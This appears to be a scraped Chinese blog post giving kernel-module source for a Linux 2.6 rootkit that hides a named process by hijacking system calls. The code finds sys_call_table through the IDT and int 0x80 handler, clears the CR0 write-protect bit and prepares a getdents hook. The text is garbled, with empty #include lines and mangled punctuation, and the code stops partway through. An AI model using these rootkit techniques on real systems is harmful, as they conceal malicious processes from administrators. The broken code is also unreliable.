linux系统调用劫持隐藏进程,Linux2.6内核中劫持系统调用隐藏进程的原理是什么呢？...

隐藏进程的原理,可以查看其他相关文章,主要是通过int 0x80 找sys_call_table的地址。

测试环境: ubuntu9。04 内核版本2。6。28

模块代码如下:

/*hideps。c*/

#include linux/module。

h>

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

//#include

//#include

#define CALLOFF 100

//使用模块参数来定义需要隐藏的进程名

int orig_cr0;

char psname[10]="looptest";

char *processname=psname;

//module_param(processname, charp, 0);

struct {

unsigned short limit;

unsigned int base;

} __attribute__ ((packed)) idtr;

struct {

unsigned short off1;

unsigned short sel;

unsigned char none,flags;

unsigned short off2;

} __attribute__ ((packed)) * idt;

struct linux_dirent{

unsigned long

d_ino;

unsigned long

d_off;

unsigned short

d_reclen;

char

d_name[1];

};

void** sys_call_table;

unsigned int clear_and_return_cr0(void)

{

unsigned int cr0 = 0;

unsigned int ret;

asm volatile ("movl %%cr0, %%eax"

: "=a"(cr0)

);

ret = cr0;

/*clear the 20th bit of CR0,*/

cr0 &= 0xfffeffff;

asm volatile ("movl %%eax, %%cr0"

:

: "a"(cr0)

);

return ret;

}

void setback_cr0(unsigned int val)

{

asm volatile ("movl %%eax, %%cr0"

:

: "a"(val)

);

}

asmlinkage long (*orig_getdents)(unsigned int fd,

struct linux_dirent __user *dirp, unsigned int count);

char * findoffset(char *start)

{

char *p;

for (p = start; p < start + CALLOFF; p++)

if (*(p + 0) == '\xff' && *(p + 1) == '\x14' && *(p + 2) == '\x85')

return p;

return NULL;

}。

全部